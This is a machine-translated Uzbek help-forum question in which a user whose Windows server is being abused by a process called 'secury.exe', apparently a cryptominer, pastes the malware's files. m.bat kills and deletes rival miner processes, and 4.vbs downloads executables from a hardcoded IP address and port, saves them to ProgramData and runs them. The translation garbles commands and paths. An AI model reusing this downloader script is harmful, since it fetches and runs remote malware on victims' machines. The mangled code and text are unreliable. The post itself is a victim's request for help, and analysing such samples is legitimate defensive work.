Vazifa menejerida quyidagi holat mavjud:
Men qanday dastur ekanligini bilmayman, lekin men uni o'rnatib qo'yganim yo'q va uni o'chira olmagani uchun, albatta, Buxoriy dastur bootstrapper emas.
Qanday ilovani bu qadam orqali amalga oshirishni tushunishga harakat qilsam:
Men shunday bir narsani ko'rmoqdaman:
MS Config dasturida secury.exega o'xshash biror narsa topilmadi.
Fayl manzilini ochganimda, uchta faylni ko'rdim:
m.bat, b.exe, 4.vbs.
Quyida m.bat mazmuni ketadi:
taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe vazifa kili / f / t / IM Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe vazifa kili / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe vazifa kili / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe bilan C: \ Windows \ System32 \ soiuos.exe del C: \ ProgramData \ explorer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ DasturData \ MSASCui.exe del C: \ Pro C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe C: \ ProgramData \ msdc.exe faylida grammatikaning \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe faylini ochamiz: C: \ ProgramData \ lgrtqe.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ Svchosts.exe del C: \ ProgramData \ win1ogins.exe C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe bilan C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exeKeyingi 4.vbs ketadi:
Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "Get", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 to'siq xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "Get", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). "C: \ ProgramData \ pool3.exe" ishga tushirish CreateObject ( "WScript.Shell") "del C: \ ProgramData \ pool3.exe" ishga tushirishSecury.exe serverimning hisoblash vakolatlarini suiiste'mol qilishni to'xtatish uchun nima qilishim kerak?
PS Avast kompyuterimni to'liq tekshirib chiqdim, lekin u noto'g'ri narsa topmadi.
Exe serverimning hisoblash vakolatlarini suiiste'mol qilishni to'xtatish uchun nima qilishim kerak?